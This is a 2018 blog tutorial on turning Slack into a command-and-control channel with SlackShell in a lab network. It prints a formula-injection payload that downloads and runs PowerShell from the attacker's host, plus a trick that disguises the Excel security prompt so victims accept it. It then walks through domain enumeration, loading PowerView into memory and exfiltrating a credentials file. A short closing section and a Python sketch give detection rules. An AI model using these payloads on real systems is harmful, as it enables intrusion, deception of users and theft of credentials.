Saturday, June 9, 2018

How to use Slack as C2 Server

Hello All,

INTRODUCTION

The purpose of this post is to demonstrate how Slack channels can be used as a Command & Control server (C&C / C2) and to walk you through a demonstration of using it to our benefit. This was also demonstrated at the Null Mumbai meetup on 09-June-2018 (Slides).

Please note this post is for educational purposes only.

What is Slack ?

Slack is a cloud-based set of proprietary team collaboration tools and services. It lets you create a workspace, which in turn allows you to create a team and use it as the team's communication channel. It supports group messaging, personal messaging, file sharing, etc. Many organizations use Slack for their communications and have multiple groups based on departments or tasks. It also supports integration with multiple applications such as Gdrive, Jira, Dropbox, etc.

What is Command & Control Server (C&C / C2) ?

In simple words, C&C servers are centralized systems that issue directives to the infected systems connected to them. C&C servers can also be used to build a powerful network of infected systems for use in major attacks such as DDoS. C&C server connections are mainly observed in malware that tries to gain persistence on the infected systems. In general, the infected systems connected to C&C servers are known as botnets and the network of botnets is known as zombies.



PATH OF EXPLORATION

While using Twitter I came across a tweet from Brent Kennedy about an update to the SlackShell1.1 version. I immediately clicked on the GitHub repo and started reading the readme file. After reading the readme file I thought of playing with the repo and started using it to understand all the available options.

REQUIREMENTS

1) The system should have PowerShell version 3 or above.

2) Slack Workspace #anything.slack.com

Create a new Slack workspace or use an existing one on which you have admin rights.
Link to create a Slack workspace.

3) Slack Legacy Token #xoxp-xxxxxxxxxxxx-xxxxxxxxxxxx-xxxxxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Link to generate a Slack legacy token. This token lets us connect to the Slack channel and perform tasks such as sending and reading messages, which is how our commands get executed on the system.

Note:- Please don't share the legacy token with anyone, since it grants access to the Slack channel: whoever holds it can read and post messages and do many other things. Please read the link for more details on keeping the token safe.

4) Slack Channel ID #XXXXXXXXX

Copy the Slack channel ID, which you can see in the URL when accessing the Slack app in a browser.

Example link to your Slack channel:

https://anything.slack.com/messages/ABC123456

The channel ID is "ABC123456".

LAB DETAILS

1) Domain Controller (Active Directory) 2k12 (10.0.2.15)
2) Windows 10 (10.0.2.21) - Victim system
3) Kali Linux (10.0.2.4) - Attacker system


THE MOST AWAITED DEEP DIVE POC

We will assume a scenario where we deliver our initial payload using a Formula / CSV injection attack, which downloads our custom script from a URL hosted on our local system and executes it in memory. Our script then downloads the SlackShell1.1 PowerShell script and imports it as a module. It then executes the command to connect to our Slack channel.

Custom Script



Run a Python web server to host our script.

python -m SimpleHTTPServer 8000


Formula used to download the custom script. It will pop up some alerts while executing the formula; just click Yes and proceed.

=cmd|'/C powershell.exe -exec bypass -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(''http://10.0.2.4:8000/my.ps1'');powershell.exe -c iex($e)' !A1



There are ways of changing the text displayed in the alert where it shows CMD.EXE so that it looks more genuine. A great post on Twitter by Ryan Hanson helped us complete our task by changing CMD.EXE to any other text. We will use MSEXCEL.EXE so it looks more realistic.

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /C powershell.exe -exec bypass -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(''http://10.0.2.4:8000/my.ps1'');powershell.exe -c iex($e)'!A1


Once the PowerShell script is executed, the system connects to our Slack channel and we get a message on the channel containing the system hostname.


Commands supported in the current repo.

1) Execute direct commands

We can directly type a command in the Slack channel and it will be executed on the system. This also lets us enumerate and fetch information from the system.
Below are some examples of how we can execute direct commands.

A) Execute some applications like Calculator.

     Command - calc.exe


B) Fetch system IP.

On the left side I have executed the ipconfig command in cmd to show that we are able to get the same IP details using Slack.

     Command - ipconfig


C) Enumerate the user information.

     1) Identify current user.

         Command - whoami


     2) Find all local users on the system.

         Command - net user


     3) Find all users which are created in the domain.

         Command - net user /domain


     4) Fetch individual user details. We will look at both local and domain user details. We will fetch the details for "IEUser", which is a local user, and "user1", which is a domain user. We found these user names while fetching the info on all users.

         Command - net user IEUser


         Command - net user user1 /domain


     5) Find all local group which are created on the system.

         Command - net localgroup


     6) Find all group which are created on the domain controller.

         Command - net group /domain


     7) Find users that are members of a group. We will look at both local and domain groups. We will fetch the details for "Administrators", which is a local group, and "Domain Admins", which is a domain group. We found these group names while fetching the info on all groups.

         Command - net localgroup "Administrators"


         Command - net group "Domain Admins" /domain


D) Fetch system information.

     Command - systeminfo


As demonstrated above, we can execute any other command directly to fetch any details or run any application. All this information will help us conduct more sophisticated attacks.

2) Execute commands that spawn a new PowerShell process and run there.

All the above commands can be executed in a newly spawned process just by adding the runjob text at the beginning of the command. Below are some commands that will be executed by spawning a new PowerShell process.

Command - runjob calc.exe


Command - runjob ipconfig


In the same way, all the commands can be run in another spawned PowerShell process.

Note - Use runjob only if there is a necessity to run the command in another process.

3) Importing files & loading the same into the memory.

Now just think: what if I tell you that we can also import PowerShell scripts directly into memory and run them? It sounds really good, right?

So I will show how to import the PowerView script into memory and execute some commands that will again help us with enumeration. We can import any PowerShell script, but for this blog post I will only be using the PowerView script.

First we need to upload the PowerView.ps1 script to the Slack channel and then execute the command below to import it into memory.
Before executing the import command we can also list the files uploaded to the Slack channel, so that we specify the correct script file name and avoid errors.

Command - files


Command - import PowerView.ps1


Now that the PowerView script is successfully imported, we will fire some commands that again help us fetch domain and user information.

The command below fetches the domain information.

Command - Get-NetDomain


The command below fetches the information on all users.

Command - Get-NetUser


There are many more commands that can be executed to gather information. The list of available commands can be found here.

4) Write / Save a file on disk.

We can write / save any file to the storage disk of the target system.

First we need to upload the file to the Slack channel and then provide the path where the file needs to be saved. Below is an example of how we can write / save a file to disk.

Command - download test.txt C:\Users\user1\Desktop



5) Change / Traverse from current directories.

We can change / traverse from the current directory. This helps us enumerate files located on the disk.

Command - cd C:\Users\user1\Desktop


6) Exfiltrate the data on the slack channel.

We can exfiltrate data stored on the local file system to the Slack channel. As I have stated above, I will upload the cred.txt file to the Slack channel. Since we are already in the Desktop location we will use the command below. We can also specify the complete file path.

Command - upload cred.txt


7) Disconnect the system.

Since we have accomplished our goal of exfiltrating the cred.txt file, we will disconnect the system.

Command - exit


We can gain many more details about the systems and also compromise more systems in the network.
Each system can connect to its own Slack channel, which makes managing the systems easier.

8) Detection of such attacks.

A) Enable PowerShell logging on all systems.
B) Monitor all PowerShell command execution.
C) Monitor all access to Slack from PowerShell.
D) Enable Attack Surface Reduction (ASR) rules in Exploit Guard.

Note:- Exploit Guard ASR is only supported on Windows 10 Enterprise edition 1709 and above, and also on Server 2016.
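As an added illustration of points A to C (this is not code from the original post or from the SlackShell project), the Python sketch below runs three detections over constructed log records modelled on the chain shown above: PowerShell script-block text that calls the Slack API or contains an xoxp- token, an Office application spawning cmd.exe or powershell.exe, and powershell.exe connecting to slack.com. Host names, paths and the token value are placeholders; the record layout is a simplified stand-in for real PowerShell / Sysmon events.

```python
import re

# Constructed sample telemetry (not real logs), modelled on the chain in this
# post: a PowerShell script-block entry (Event ID 4104), a Sysmon process
# creation (ID 1), a Sysmon network connection (ID 3) and one benign entry.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WIN10-VICTIM",
     "text": "Invoke-RestMethod -Uri https://slack.com/api/chat.postMessage "
             "-Body @{token='xoxp-000-000-000-placeholder'; channel='ABC123456'}"},
    {"id": 1, "host": "WIN10-VICTIM",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 3, "host": "WIN10-VICTIM", "dest_host": "slack.com", "dest_port": 443,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 4104, "host": "ADMIN-WS",
     "text": "Get-Service | Where-Object Status -eq Running"},
]

SLACK_API = re.compile(r"slack\.com/api/", re.IGNORECASE)
SLACK_TOKEN = re.compile(r"\bxox[abpr]-[A-Za-z0-9-]{8,}")  # xoxp = legacy token
OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the detections that fire for one event."""
    hits = []
    if event["id"] == 4104:  # script block logging: inspect the code itself
        if SLACK_API.search(event["text"]):
            hits.append("powershell-calls-slack-api")
        if SLACK_TOKEN.search(event["text"]):
            hits.append("slack-token-in-scriptblock")
    elif event["id"] == 1:  # Office app launching a shell (CSV / DDE delivery)
        if basename(event["parent"]) in OFFICE_APPS and basename(event["image"]) in SHELLS:
            hits.append("office-spawns-shell")
    elif event["id"] == 3:  # PowerShell talking to Slack over the network
        if basename(event["image"]) == "powershell.exe" and event["dest_host"].endswith("slack.com"):
            hits.append("powershell-connects-to-slack")
    return hits

def scan(events):
    """Aggregate detections per host so a host showing the whole chain stands out."""
    report = {}
    for ev in events:
        for name in classify(ev):
            report.setdefault(ev["host"], set()).add(name)
    return {host: sorted(names) for host, names in report.items()}
```

A single hit can be benign (an admin's Slack integration script, for instance); the per-host aggregation is what makes the Excel-to-cmd-to-PowerShell-to-Slack sequence stand out.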

Thanks for reading the post.
Thanks to Brent Kennedy for creating such a great repo, and to the Null Mumbai community for allowing me to present it at the monthly chapter meetup.

Special thanks to all my friends who helped / supported / motivated me to write blogs. 🙏
